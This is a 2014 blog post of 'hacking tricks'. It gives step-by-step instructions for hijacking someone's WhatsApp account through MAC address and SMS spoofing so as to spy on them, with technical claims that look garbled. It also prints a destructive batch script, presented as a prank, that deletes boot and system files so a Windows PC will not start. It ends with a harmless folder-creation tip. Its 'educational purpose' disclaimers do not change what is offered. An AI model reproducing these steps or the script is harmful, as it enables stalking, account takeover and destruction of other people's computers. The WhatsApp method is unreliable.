Sunday 30 March 2014

HOW TO HACK WHATSAPP ACCOUNT

Note:- This information has been shared to create awareness among people regarding the “Ways to Hack Whatsapp” so that you can protect yourself from getting hacked. In no way do we promote misusing of the information.

 

All you need is to get access to victim phone to get the victims phone “MAC address along with the verifying massage” which is acquired to verify your device.

Get mac address on your android phone.


Finding MAC address on an Android Phones


On your phone’s home screen, click on menu, then go to setting.


Click on about phone.


Click on the status.


And then view your Wi-Fi MAC address.


As soon the message is received Push the MAC address as well as Verifying code to your server or mail it your ID. That banks on your convince.


Cheat your phone’s MAC address to the Victims address and install whatsapp and after that type the verify code.


And now its done. You get full access to the victim’s whatsapp ID. So now you can keep spying/watching your victim’s movements.


That means you and the victim is using the same ID from different devices.
Whatsapp hack to use it by not using your number


This hack works by cheating the Whatsapp Verification Servers by sending a spoofed request for an authorisation code expected for a different phone.


Install Whatsapp on your device. Whatsapp now opens a counter where it sends a verification message to its servers.


Block the message service – it can be blocked by changing the message centre number or turning the phone into Airplane mode.


Whatsapp now gives a substitute method of verification – Select verify through SMS and fill in your email address. Once you click to send the SMS press cancel to abort the call for authorisation to the Whatsapp server.


Now you have to do sms Spoofing.


Examine your outbox and copy the message details into the spoofer application and send the spoofed verification.


You will now receive messages expected for the spoofed number on your mobile device and you can communicate with people under the spoofed number.


                                                          Enjoy



"NOTE: THE AUTHOR OF THIS BLOG DOES NOT HOLD ANY RESPONSIBILITY IF THIS ARTICLE IS USED TO HARM OTHERS.THIS IS JUST FOR EDUCATIONAL PURPOSE."<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-in.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=IN&source=ac&ref=tf_til&ad_type=product_link&tracking_id=virtualphase3-21&marketplace=amazon&region=IN&placement=B00D75AB6I&asins=B00D75AB6I&linkId=9952f2b5e5bbf7eed9e1c92985ed420d&show_border=true&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>

SHUT DOWN PC FOREVER

"The following article is just for educational purpose, for the one who wish to learn tricks in computer.The author does not hold any responsibility if someone uses it to harm others."

 Its always fun to to play pranks with your friends.

Messing with their  personal things and always trying to creats the worst situation for them and we laugh at them

And if we play a trick on their computer and if the PC wont start again!!!

A very simple trick in notepad and the computer wont start again without the re-installation of the operating system on it.



Open notepad and copy paste the following code in it.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Save the file with extension ".bat" (without quotes)
For example- file.bat

Now you wont dare to open the file. If you open it in your own computer, your own computer wont start without the re-installation of your operating system.

Creating May Folder Using A Single File-Notepad Trick




1     1)      Open  notepad.

2     2)      Type:
            MD 1 2 3 4 5 6 7 8 9 10 

3     3)      Save file as with extension “.bat” (without quotes)
            Example- file.bat

4     4)      Open the file.

5     5)      You will see ten new folders will be created with name  1,2,3,4,5,6,7,8,9,10.

6     6)      If you want to name the folders something else, then instead of numbers your can write
              some other names  in the notepad while coding the file.

  For example- MD ana mia jia sam tom

Folder will be created with names  ana, mia, jia ,sam ,tom .

Don’t forget to give spaces between the names you give to the folder.

              Enjoy creating a very large number of folder with one click.